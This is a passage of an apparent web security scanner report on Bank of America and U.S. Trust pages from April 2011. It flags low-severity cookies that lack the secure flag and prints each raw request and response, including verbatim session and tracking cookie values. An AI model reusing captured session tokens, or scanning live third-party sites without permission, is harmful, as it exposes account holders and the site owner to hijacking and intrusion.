Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000TQk9nyNVXhD3M3oMcJ_JRuk:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 48014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.31. https://www.bankofamerica.com/military  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /military

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /military HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:52 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:52 GMT
Location: https://www.bankofamerica.com/military/
Connection: close


9.32. https://www.bankofamerica.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:53 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:53 GMT
Location: https://www.bankofamerica.com/privacy/
Connection: close


9.33. https://www.bankofamerica.com/privacy/Control.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/Control.do?body=privacysecur_unauthorised_acc_use HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:49 GMT
Content-length: 0
Location: https://www.bankofamerica.com/privacy/Control.do?body=privacysecur_resolve_fraud
Content-language: en-US
Set-cookie: JSESSIONID=00001VjF6Tcy6jJdOdG1SbWoNG-:12qb4kb6q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


9.34. https://www.bankofamerica.com/privacy/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:48 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000HFr9VVqs6DZvnB1LrBiUHIT:12qb4k93q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...

9.35. https://www.bankofamerica.com/search/Search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /search/Search.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/Search.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:49 GMT
Content-length: 0
Location: https://www6.bankofamerica.com/search/Search.do
Content-language: en-US
Set-cookie: JSESSIONID=0000xbRy8_ejvIwVZwAv3xumRzj:13ihk3qeh; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


9.36. https://www.bankofamerica.com/smallbusiness/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:46:04 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000RP8_STCkOcHUGUzx8ITXdFM:12rfueg3b; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...

9.37. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/hs_home/stylesheets/home_win_ns6.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/hs_home/stylesheets/home_win_ns6.css HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:53 GMT
Content-type: text/css
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:53 GMT
Last-modified: Tue, 25 Nov 2008 19:59:27 GMT
Etag: "99e-492c591f"
Accept-ranges: bytes
Content-Length: 12756

.h3-whitetext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #FFFFFF; PADDING-TOP: 18px; FONT-FAMILY: Verdana;
   font-weight: bold
}

.h3-graytext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #333333;
...[SNIP]...

9.38. https://www.bankofamerica.com/www/en_US/global/js/masthead.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/js/masthead.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/js/masthead.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:55 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:55 GMT
Last-modified: Wed, 21 Jan 2009 15:42:02 GMT
Etag: "2aa-4977424a"
Accept-ranges: bytes
Content-Length: 1606

function submit_search(){ document.SiteSearchForm.submit(); }

function bt_rollover(ref, classRef) { eval(ref).className = classRef; }

function create_button(text, href, css_class, onclick_evt,
...[SNIP]...

9.39. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/jquery-1.2.6.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/jquery-1.2.6.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:59 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:59 GMT
Last-modified: Wed, 21 Jan 2009 15:45:14 GMT
Etag: "3d2e-4977430a"
Accept-ranges: bytes
Content-Length: 31043

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...

9.40. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/search-lite.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/search-lite.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:02 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:02 GMT
Last-modified: Thu, 23 Apr 2009 13:34:52 GMT
Etag: "4be-49f06e7c"
Accept-ranges: bytes
Content-Length: 3881

// Search Autocomplete routines.
// updated: 2009.04.02
// English

var search_box_default = "Enter keyword(s)";
var search_box_prompt = "You must enter a keyword before clicking on Search button
...[SNIP]...

9.41. https://www.bankofamerica.com/www/global/js/tc_logging.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/global/js/tc_logging.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/global/js/tc_logging.js? HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
Cache-Control: max-age=0
If-Modified-Since: Wed, 01 Aug 2007 17:46:04 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
If-None-Match: "2f30-46b0c6dc"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US

Response

HTTP/1.1 304 Use local copy
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:59 GMT
Etag: "2f30-46b0c6dc"
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:59 GMT


9.42. https://www.fs.ustrust.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=1 HTTP/1.1
Host: www.fs.ustrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 3D2F794B
Set-Cookie: Bear=HdC5r0QnFpMuvDTYknZMKN4FD4TbXTCUXG9mmgSSpfc=; domain=.fs.ustrust.com; path=/
